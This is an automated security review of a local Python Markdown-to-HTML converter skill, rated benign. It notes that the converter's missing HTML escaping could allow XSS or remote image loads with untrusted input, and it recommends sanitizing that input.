Skillv1.0.0

ClawScan security

Skill 2 · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

BenignFeb 22, 2026, 4:32 PM

Verdict: benign
Confidence: high
Model: gpt-5-mini
Summary: This is a coherent, local Python Markdown→HTML converter that matches its description, but it does not sanitize or escape arbitrary HTML/URLs in Markdown output — so rendered output can load remote resources or enable XSS if you render untrusted input.
Guidance: This skill appears to do what it says and runs locally, but treat output HTML as potentially unsafe if the Markdown is untrusted. Before using with third-party or user-provided Markdown, either: (a) sanitize the input (or sanitize the produced HTML) to strip scripts, javascript: URIs, and dangerous tags/attributes (e.g., using html.escape or a library like bleach), (b) avoid opening generated HTML in a browser for untrusted content, or (c) extend the tool to escape HTML in non-code text and validate/relativize image/link URLs. Also note that images referenced in the Markdown will be loaded by a browser when the HTML is opened, which can leak requester IPs and other metadata. If you need robust CommonMark compliance and XSS protection, prefer a well-maintained Markdown library plus an HTML sanitizer.

Purpose & Capability: okName/description match the provided files: a small, zero-dependency Python tool that converts Markdown to styled HTML with embedded CSS. The code implements the claimed features (headings, lists, links, images, code blocks, etc.), though 'Full Markdown support' is an optimistic claim (the converter is a hand-rolled subset, not a complete CommonMark implementation).
Instruction Scope: concernSKILL.md and main.py are scoped to reading a file or stdin and producing an HTML file (expected). However, the converter does not HTML-escape arbitrary non-code text nor sanitize links/images. That means user-supplied Markdown can inject raw HTML or create links with javascript: URIs, and produced HTML can cause remote resource loads (images) or XSS when opened in a browser. The README does not warn about these risks and 'self-contained' might be misread as 'no external resource loads' (only the CSS is embedded).
Install Mechanism: okNo install spec; instruction-only with a single local Python script that uses the standard library. Nothing is downloaded or written beyond outputs the script itself creates (the HTML output file). Low install risk.
Credentials: okNo environment variables, credentials, or config paths are requested — proportional and appropriate for a local file conversion utility.
Persistence & Privilege: okNo persistent or elevated privileges requested. always is false; the skill does not modify other skills or system configuration.